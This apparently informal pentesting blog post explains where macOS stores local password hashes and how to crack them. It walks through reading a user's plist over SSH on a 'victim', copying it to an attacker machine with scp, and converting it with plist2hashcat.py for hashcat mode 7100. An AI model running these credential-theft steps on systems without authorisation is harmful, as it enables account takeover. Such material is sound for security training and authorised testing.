How do we crack OS X password hashes?

I haven’t had tea but I was thinking about the MAC i was remoting into and I suddenly thought.. I wonder how to crack the hashes from a MAC. Surely it’s just cat /etc/passwd and cat /etc/shadow and then unshadow and run hashcat right?

WRONG!

The hashes for local users are stored here:

There is a .plist file per [usernanme] e.g for user: “user” we would do the following:

sudo cat /var/db/dslocal/nodes/Default/users/user.plist

The file format is XML and is a “Property List” file type:

https://en.wikipedia.org/wiki/Property_list

https://support.apple.com/en-gb/guide/terminal/apda49a1bb2-577e-4721-8f25-ffc0836f6997/mac

We need to extract the hash, there are two tools for this:

plist2hashcat.py

https://gist.github.com/nueh/8252572

mac2john.py

https://github.com/openwall/john
https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/mac2john.py

Hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat mode: 7100

macOS v10.8+ (PBKDF2-SHA512)

Example hash: $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222

Demo

If you want to follow along but you don’t have a mac, don’t worry:

#From SSH on the victim
sudo cat /var/db/dslocal/nodes/Default/users/user.plist

cp /var/db/dslocal/nodes/Default/users/user.plist /Users/user/Desktop/user.plist
chown -R user:staff user.plist

#Fom Attacker KALI/Linux/whatever machine

scp [email protected]:/Users/user/Desktop/user.plist ./

wget https://gist.githubusercontent.com/nueh/8252572/raw/1c5992fccf093dcce13572c6980176864edaf816/plist2hashcat.py

chmod +x plist2hashcat.py

python2 ./plist2hashcat.py user.plist

user:$ml$73529$7331440ead78f9e9567de0f4be67558615e8e1dc3b40d9ac30a0fc26c5dd1d26$2fc1cde58115106f369d44d06ff9f8bd91c4d487bd382d6d110e18a2ab217bd4150ff26d12148ae43fbe04cc7cb67434afad454c4134c7db68e0d0f7c8519bf8